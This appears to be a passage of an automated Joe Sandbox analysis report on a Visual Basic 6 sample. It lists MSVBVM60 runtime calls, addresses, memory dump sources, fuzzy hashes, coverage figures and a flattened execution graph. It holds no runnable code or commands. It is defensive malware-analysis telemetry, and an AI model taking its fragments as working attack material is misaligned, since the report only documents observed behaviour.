                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292CD
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292D8
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292F8
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429301
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429307
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                    • String ID:
                                                                                    • API String ID: 2075080343-0
                                                                                    • Opcode ID: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                    • Instruction ID: 9ff539ebce5fad2b4699ffef5be23d845548c77eebf422f0d85762e4eecb91bf
                                                                                    • Opcode Fuzzy Hash: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                    • Instruction Fuzzy Hash: 88018B71940214ABCB00AFA4CE48E9EBBB8FF48701F50406AF845B22A0CB7C55008AB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 004200BC
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 004200C6
                                                                                    • #529.MSVBVM60(00004008), ref: 004200E2
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004200EF
                                                                                    • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CloseFile$#529DestructExitFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 4288299288-0
                                                                                    • Opcode ID: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
                                                                                    • Instruction ID: e63006f6629530c6f9d06262b1e3e783061ea391c4db22c70a24105a95955a76
                                                                                    • Opcode Fuzzy Hash: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
                                                                                    • Instruction Fuzzy Hash: 39F0E775D00218CECF10EFA0DD44BEDB7B8BB48300F4081AAE54AA7560DB741A89CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E68B
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E693
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041E695
                                                                                    • __vbaFreeVar.MSVBVM60(0041E706), ref: 0041E6F2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E6FA
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041E703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AddrefFree$DestructExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 474453485-0
                                                                                    • Opcode ID: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                    • Instruction ID: 667f1fbceb99d918350a8c93aba1b8ec047f02208f043dfad400775f7d70227f
                                                                                    • Opcode Fuzzy Hash: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                    • Instruction Fuzzy Hash: A6E0E531D60128AADB04DBA0ED55FED7B38BF14700F54406AF902B30E09F746945CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420BA1
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420BAB
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00420BB4
                                                                                    • __vbaFreeStr.MSVBVM60(00420BF8), ref: 00420BEB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00420BF0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00420BF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$CloseFile$ExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 2014117853-0
                                                                                    • Opcode ID: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                    • Instruction ID: 1a74a742803cabf7b99f207da3827670e0b1cecb12e14af3a137c0d733611b17
                                                                                    • Opcode Fuzzy Hash: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                    • Instruction Fuzzy Hash: 3FE01A71D04128CACB14ABE0FD4069C7BB4AB08310B904167A402B3174DB742985CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00418D00: __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,660E6A76,660E6C30,?), ref: 00418D1E
                                                                                      • Part of subcall function 00418D00: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                      • Part of subcall function 00418D00: __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                      • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                      • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                      • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                      • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                      • Part of subcall function 00418D00: __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                      • Part of subcall function 00418D00: __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                      • Part of subcall function 00418D00: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                      • Part of subcall function 004199F0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 00419A0E
                                                                                      • Part of subcall function 004199F0: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 00419A3E
                                                                                      • Part of subcall function 004199F0: __vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 00419A68
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188), ref: 00418C86
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00418C96
                                                                                    • __vbaI4Var.MSVBVM60(?,00000000), ref: 00418CA9
                                                                                    • __vbaFreeObj.MSVBVM60(00000000), ref: 00418CB8
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00418CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Ansi$Error$Free$ChkstkMoveSystem$CallCheckHresultLateList
                                                                                    • String ID:
                                                                                    • API String ID: 873780948-0
                                                                                    • Opcode ID: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                    • Instruction ID: 16d286b73a6ce5193caf80716aadf59a34bdb77ef37626ee72a0c3f1c06fc46a
                                                                                    • Opcode Fuzzy Hash: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                    • Instruction Fuzzy Hash: 63211DB5900209ABCB00DF95C989DEFBBBCEF58704F10451EF901B7250DA74A985CBB5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorFreeNew2System
                                                                                    • String ID:
                                                                                    • API String ID: 3252491692-0
                                                                                    • Opcode ID: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                    • Instruction ID: 1035c00175c6c81f3f144980975e95b43d78c84e63a20c1226013f986c834cc1
                                                                                    • Opcode Fuzzy Hash: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                    • Instruction Fuzzy Hash: 30219570A40615EBCB20CFA5EE49E9FBF78FB58740F110126F105B32E0D7B499818BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 4045702744-0
                                                                                    • Opcode ID: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                    • Instruction ID: edda45edb35fde8433b36ffd3ef84c2269d30266a9ece54bd624009aaa599c45
                                                                                    • Opcode Fuzzy Hash: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                    • Instruction Fuzzy Hash: 34215870901214EFCB00DFA5CA48E9EBBF8FF98704F64456AF405B72A0CB7859458AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,-00000009,?,660E6A9B,0041FB86), ref: 00420F20
                                                                                    • __vbaI2I4.MSVBVM60(00000000,-00000009,?,660E6A9B,0041FB86), ref: 00420F27
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F4D
                                                                                    • __vbaI2I4.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F54
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 2760075901-0
                                                                                    • Opcode ID: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                    • Instruction ID: 93c54f63ccc5981ea9e36820505c7139a37b1fec0ba499ff43ef88027195e6a9
                                                                                    • Opcode Fuzzy Hash: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                    • Instruction Fuzzy Hash: D9F0F637B4416052C364477DEA8559AB3D7AB8C783BC20177E248576738DB858C143AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _adj_fdiv_m64.MSVBVM60(?,?), ref: 0042AC13
                                                                                    • __vbaExitProc.MSVBVM60(?,?), ref: 0042AC21
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042AC5E), ref: 0042AC53
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042AC5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Destruct$ExitProc_adj_fdiv_m64
                                                                                    • String ID:
                                                                                    • API String ID: 3272950176-0
                                                                                    • Opcode ID: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                    • Instruction ID: 432503350bff8fd263bfd7ee333f73b5f20f6540c55ce1ae75e3df8e8a0f3385
                                                                                    • Opcode Fuzzy Hash: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                    • Instruction Fuzzy Hash: 74F01730E48128EBDB209B51ED44BE8BB38BB54301F9080EAE58471094CBB95EE19F5A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:26.6%
                                                                                    Dynamic/Decrypted Code Coverage:1.1%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:454
                                                                                    Total number of Limit Nodes:50
1344->1216 1344->1264 1344->1273 1344->1280 1344->1294 1344->1300 1344->1301 1344->1312 1344->1317 1344->1330 1344->1333 1344->1334 1344->1339 1344->1341 1347 41ccec __vbaSetSystemError 1344->1347 1348 41b018 32 API calls 1345->1348 1349 41da40 __vbaErase __vbaFreeStrList 1346->1349 1347->1344 1350 41d8fb __vbaErase __vbaFreeStrList 1348->1350 1349->1171 1351 41daa1 __vbaStrCopy 1349->1351 1350->1171 1352 41acf6 12 API calls 1351->1352 1353 41dabd __vbaStrMove __vbaStrCopy __vbaStrMove 1352->1353 1354 41ae58 21 API calls 1353->1354 1355 41db11 7 API calls 1354->1355 1356 41b018 32 API calls 1355->1356 1357 41dbcc __vbaErase __vbaFreeStrList 1356->1357 1357->1171 1359 416d9d 1358->1359 1360 419436 __vbaChkstk 1361 419487 __vbaOnError 1360->1361 1362 4194ad __vbaStrCopy 1361->1362 1363 41951f 1361->1363 1407 418c4b __vbaChkstk 1362->1407 1364 41997d __vbaErrorOverflow __vbaChkstk 1363->1364 1369 41954d __vbaStrCopy 1363->1369 1370 4195bf 1363->1370 1368 4199d3 __vbaOnError 1364->1368 1365 4194d7 1366 4194e0 __vbaHresultCheckObj 1365->1366 1367 4194fa 1365->1367 1371 4194fe __vbaFreeStr __vbaFreeVar 1366->1371 1367->1371 1372 4199fa 1368->1372 1403 418c4b 94 API calls 1369->1403 1370->1364 1374 4195ed __vbaStrCopy 1370->1374 1375 41965f 1370->1375 1371->1363 1373 419577 1376 419580 __vbaHresultCheckObj 1373->1376 1377 41959a 1373->1377 1406 418c4b 94 API calls 1374->1406 1375->1364 1382 41968d __vbaStrCopy 1375->1382 1383 4196ff 1375->1383 1378 41959e __vbaFreeStr __vbaFreeVar 1376->1378 1377->1378 1378->1370 1379 419617 1380 419620 __vbaHresultCheckObj 1379->1380 1381 41963a 1379->1381 1384 41963e __vbaFreeStr __vbaFreeVar 1380->1384 1381->1384 1405 418c4b 94 API calls 1382->1405 1383->1364 1385 419716 1383->1385 1384->1375 1389 419930 1385->1389 1390 419732 6 API calls 1385->1390 1386 4196b7 1387 4196c0 __vbaHresultCheckObj 1386->1387 1388 4196da 1386->1388 1391 4196de __vbaFreeStr __vbaFreeVar 1387->1391 1388->1391 1392 419831 6 API calls 1390->1392 1393 41979b 
__vbaStrCat __vbaStrMove __vbaStrCopy __vbaStrCopy 1390->1393 1391->1385 1392->1389 1394 41989a __vbaStrCat __vbaStrMove __vbaStrCopy __vbaStrCopy 1392->1394 1395 4197f4 1393->1395 1396 4198f3 1394->1396 1397 419817 1395->1397 1398 4197fd __vbaHresultCheckObj 1395->1398 1399 419916 1396->1399 1400 4198fc __vbaHresultCheckObj 1396->1400 1401 41981b __vbaFreeStrList 1397->1401 1398->1401 1402 41991a __vbaFreeStrList 1399->1402 1400->1402 1401->1392 1402->1389 1403->1373 1405->1386 1406->1379 1408 418c94 __vbaOnError 1407->1408 1409 418cd5 1408->1409 1410 418cbc __vbaNew2 1408->1410 1411 41aafb 20 API calls 1409->1411 1410->1409 1412 418d06 __vbaStrMove 1411->1412 1413 418d22 1412->1413 1414 418d53 1413->1414 1415 418d33 __vbaHresultCheckObj 1413->1415 1416 418d5a __vbaCastObj __vbaObjSet __vbaFreeStr __vbaFreeObj 1414->1416 1415->1416 1417 418da3 1416->1417 1418 418dd1 1417->1418 1419 418db4 __vbaHresultCheckObj 1417->1419 1420 418dd8 __vbaObjSet __vbaForEachCollObj 1418->1420 1419->1420 1426 418e18 1420->1426 1421 41931a 6 API calls 1422 4193d1 __vbaFreeObjList __vbaFreeObj __vbaAryDestruct __vbaFreeObj __vbaFreeObj 1421->1422 1422->1365 1423 418e3f __vbaHresultCheckObj 1423->1426 1424 418e83 __vbaHresultCheckObj 1425 418ea7 __vbaInStr __vbaInStr __vbaFreeStrList 1424->1425 1425->1426 1426->1421 1426->1423 1426->1424 1426->1425 1427 41917e __vbaHresultCheckObj 1426->1427 1428 418f2e __vbaHresultCheckObj 1426->1428 1429 41aafb 20 API calls 1426->1429 1430 41aafb 20 API calls 1426->1430 1427->1426 1428->1426 1431 4191b8 __vbaStrMove 1429->1431 1432 418f5e __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 1430->1432 1439 4191d1 1431->1439 1450 41b3e6 __vbaChkstk __vbaOnError 1432->1450 1434 418f99 __vbaStrMove 1436 418fb2 1434->1436 1435 4191e2 __vbaHresultCheckObj 1437 419206 7 API calls 1435->1437 1438 418fc3 __vbaHresultCheckObj 1436->1438 1441 41aafb 20 API calls 1436->1441 1437->1439 1438->1436 1439->1435 1439->1437 1440 41929e __vbaHresultCheckObj 
1439->1440 1442 4192c5 __vbaFreeStrList 1439->1442 1440->1442 1443 418ffd __vbaStrMove 1441->1443 1444 4192eb __vbaNextEachCollObj 1442->1444 1447 419016 1443->1447 1444->1426 1445 419027 __vbaHresultCheckObj 1446 41904b 7 API calls 1445->1446 1446->1447 1447->1445 1447->1446 1448 4190f1 __vbaHresultCheckObj 1447->1448 1449 419118 __vbaFreeStrList 1447->1449 1448->1449 1449->1444 1451 41b444 __vbaNew2 1450->1451 1452 41b45a 1450->1452 1451->1452 1453 41b4a4 1452->1453 1454 41b48d __vbaHresultCheckObj 1452->1454 1455 41b4a8 __vbaCastObj __vbaObjSet __vbaFreeObj 1453->1455 1454->1455 1457 41b4c7 1455->1457 1456 41b4e8 __vbaHresultCheckObj 1456->1457 1457->1456 1458 41b561 __vbaCastObj __vbaObjSet 1457->1458 1460 41b52c __vbaHresultCheckObj 1457->1460 1461 41b547 __vbaStrMove 1457->1461 1459 41b5a8 __vbaFreeObj __vbaFreeObj 1458->1459 1459->1434 1460->1461 1461->1457 1471 419a9a __vbaChkstk 1472 419ae3 __vbaOnError __vbaStrCopy 1471->1472 1473 41acf6 12 API calls 1472->1473 1474 419b00 __vbaStrMove __vbaStrCopy __vbaStrMove 1473->1474 1475 41ae58 21 API calls 1474->1475 1476 419b3f __vbaStrMove __vbaFreeStrList __vbaStrCopy 1475->1476 1477 41acf6 12 API calls 1476->1477 1478 419b79 __vbaStrMove __vbaStrCopy __vbaStrMove 1477->1478 1479 41ae58 21 API calls 1478->1479 1480 419bb8 __vbaStrMove __vbaFreeStrList __vbaStrCmp 1479->1480 1481 419bf3 14 API calls 1480->1481 1482 419e08 #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1480->1482 1485 419dc7 1481->1485 1483 419e64 22 API calls 1482->1483 1494 41a0a6 __vbaExitProc 1482->1494 1486 41a022 1483->1486 1488 419dd6 __vbaHresultCheckObj 1485->1488 1489 419df6 1485->1489 1490 41a051 1486->1490 1491 41a031 __vbaHresultCheckObj 1486->1491 1487 41a12a 7 API calls 1488->1489 1489->1482 1492 41a058 __vbaStrCmp __vbaFreeStr 1490->1492 1491->1492 1493 41a087 #529 1492->1493 1492->1494 1493->1494 1494->1487 1462 4019ac #100 1463 4019e4 1462->1463 1464 41a18c __vbaChkstk 1465 41a1d5 29 API calls 1464->1465 1466 41a386 __vbaExitProc 
1465->1466 1467 41a3bd __vbaFreeStr __vbaFreeObj __vbaFreeStr 1466->1467 1495 40123d 1496 401318 1495->1496 1496->1496 1497 40137e __vbaExceptHandler 1496->1497 1498 41a3ff __vbaChkstk 1499 41a448 __vbaOnError #648 __vbaFreeVar __vbaFileOpen #570 1498->1499 1500 41a54f 8 API calls 1499->1500 1501 41a4bf #570 1499->1501 1503 41aa1b __vbaErrorOverflow __vbaChkstk 1500->1503 1504 41a5e3 39 API calls 1500->1504 1502 41a4d9 6 API calls 1501->1502 1501->1503 1502->1500 1505 41aa60 #717 __vbaVar2Vec __vbaAryMove __vbaFreeVar 1503->1505 1506 41a881 1504->1506 1507 41aad3 1505->1507 1508 41a8b0 1506->1508 1509 41a890 __vbaHresultCheckObj 1506->1509 1510 41a8b7 __vbaChkstk __vbaObjVar __vbaLateMemCall __vbaFreeVar 1508->1510 1509->1510 1511 41a955 __vbaFreeVar __vbaAryDestruct __vbaAryDestruct __vbaFreeStr 1510->1511 1512 41a91d __vbaVarLateMemCallLd __vbaStrVarMove __vbaStrMove __vbaFreeVar 1510->1512 1512->1511 1468 419a0e __vbaChkstk 1469 419a5f __vbaOnError 1468->1469 1470 419a86 1469->1470

                                                                                    Callgraph

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [Control-flow graph, first block 4019ac-4019e2 (#100)]
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: #100
                                                                                    • String ID: 5a76$:nrh$mx?v$slaf$y
                                                                                    • API String ID: 1341478452-4087117608
                                                                                    • Opcode ID: ae504434ee61f0298d7d8caa9a33c12ae6aa5365d1fb4d208dedf297d2375590
                                                                                    • Instruction ID: 2d39639171d1d14927f0903683d83c7a2e95202c90fa839e62e4466a7afb7263
                                                                                    • Opcode Fuzzy Hash: ae504434ee61f0298d7d8caa9a33c12ae6aa5365d1fb4d208dedf297d2375590
                                                                                    • Instruction Fuzzy Hash: 1782546244E7C11FCB138B704E7A5917FB06E2321471E86EFC4C19E4E3D2AD994AC76A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [Control-flow graph, first block 41b886-41b939]
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B8A4
